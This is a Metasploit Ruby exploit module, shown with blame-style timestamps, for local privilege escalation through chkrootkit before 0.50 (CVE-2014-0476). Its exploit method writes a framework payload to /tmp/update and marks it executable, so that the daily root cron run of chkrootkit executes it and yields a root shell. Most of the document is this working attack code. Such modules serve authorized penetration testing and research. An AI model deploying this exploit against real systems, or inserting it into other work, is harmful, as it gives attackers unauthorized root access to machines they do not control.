2015-11-18 16:35:11 +00:00
|
|
|
##
|
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Exploit::Local
|
2015-11-18 16:35:11 +00:00
|
|
|
|
|
|
|
# This could also be Excellent, but since it requires
|
|
|
|
# up to one day to pop a shell, let's set it to Manual instead.
|
|
|
|
Rank = ManualRanking
|
|
|
|
|
|
|
|
include Msf::Post::File
|
|
|
|
include Msf::Exploit::FileDropper
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Chkrootkit Local Privilege Escalation',
|
|
|
|
'Description' => %q{
|
|
|
|
Chkrootkit before 0.50 will run any executable file named
|
|
|
|
/tmp/update as root, allowing a trivial privsec.
|
|
|
|
|
|
|
|
WfsDelay is set to 24h, since this is how often a chkrootkit
|
|
|
|
scan is scheduled by default.
|
|
|
|
},
|
|
|
|
'Author' => [
|
|
|
|
'Thomas Stangner', # Original exploit
|
|
|
|
'Julien "jvoisin" Voisin' # Metasploit module
|
|
|
|
],
|
|
|
|
'References' => [
|
|
|
|
['CVE', '2014-0476'],
|
|
|
|
['OSVDB', '107710'],
|
|
|
|
['EDB', '33899'],
|
|
|
|
['BID', '67813'],
|
|
|
|
['CWE', '20'],
|
|
|
|
['URL', 'http://seclists.org/oss-sec/2014/q2/430']
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Jun 04 2014',
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Platform' => 'unix',
|
|
|
|
'Arch' => ARCH_CMD,
|
|
|
|
'SessionTypes' => ['shell', 'meterpreter'],
|
|
|
|
'Privileged' => true,
|
|
|
|
'Stance' => Msf::Exploit::Stance::Passive,
|
|
|
|
'Targets' => [['Automatic', {}]],
|
|
|
|
'DefaultTarget' => 0,
|
|
|
|
'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options([
|
|
|
|
OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])
|
|
|
|
])
|
|
|
|
end
|
|
|
|
|
|
|
|
def check
|
|
|
|
version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1")
|
|
|
|
|
|
|
|
if version =~ /chkrootkit version 0\.[1-4]/
|
|
|
|
Exploit::CheckCode::Appears
|
|
|
|
else
|
|
|
|
Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
print_warning('Rooting depends on the crontab (this could take a while)')
|
|
|
|
|
|
|
|
write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n")
|
|
|
|
cmd_exec('chmod +x /tmp/update')
|
|
|
|
register_file_for_cleanup('/tmp/update')
|
|
|
|
|
|
|
|
print_status('Payload written to /tmp/update')
|
|
|
|
print_status('Waiting for chkrootkit to run via cron...')
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|